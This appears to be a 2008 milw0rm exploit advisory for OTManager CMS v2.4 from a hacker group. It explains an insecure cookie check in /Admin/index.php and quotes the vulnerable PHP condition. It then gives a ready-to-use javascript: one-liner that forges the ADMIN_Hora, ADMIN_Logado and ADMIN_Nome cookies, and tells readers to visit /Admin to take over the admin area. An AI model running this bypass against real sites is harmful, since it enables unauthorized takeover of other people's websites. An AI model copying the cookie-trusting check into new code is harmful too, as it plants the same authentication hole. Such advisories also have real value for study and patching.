40 lines
No EOL
1.5 KiB
Text
40 lines
No EOL
1.5 KiB
Text
###################################################################################
|
|
# #
|
|
# ...:::::OTManager CMS v2.4 Insecure Cookie Handling Vulnerability ::::.... #
|
|
###################################################################################
|
|
|
|
Virangar Security Team
|
|
|
|
www.virangar.net
|
|
www.virangar.ir
|
|
|
|
--------
|
|
Discoverd By :virangar security team(hadihadi)
|
|
|
|
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
|
|
|
|
& all virangar members & all hackerz
|
|
|
|
greetz:to my best friend in the world hadi_aryaie2004
|
|
& my lovely friend arash(imm02tal)
|
|
-------
|
|
DESCRIPTION:
|
|
OTManager CMS, suffers from insecure cookie handling, when a admin login is successfull the script creates
|
|
a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
|
|
contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
|
|
logged in as a legit admin.
|
|
---
|
|
vuln code in /Admin/index.php:
|
|
|
|
if ($_COOKIE['ADMIN_Hora'] != '' and $_COOKIE['ADMIN_Logado'] == 'SIM' and $_COOKIE['ADMIN_Nome'] != ''){
|
|
header('Location: ADM_Pagina.php'); // redirect to admin area
|
|
|
|
---
|
|
exploit:
|
|
javascript:document.cookie = "ADMIN_Hora=1; path=/"; document.cookie = "ADMIN_Logado=SIM; path=/"; document.cookie = "ADMIN_Nome=1; path=/";
|
|
-----
|
|
now visit /Admin and you can get admin access and manage the cms ;)
|
|
-------
|
|
young iranian h4ck3rz
|
|
|
|
# milw0rm.com [2008-06-27] |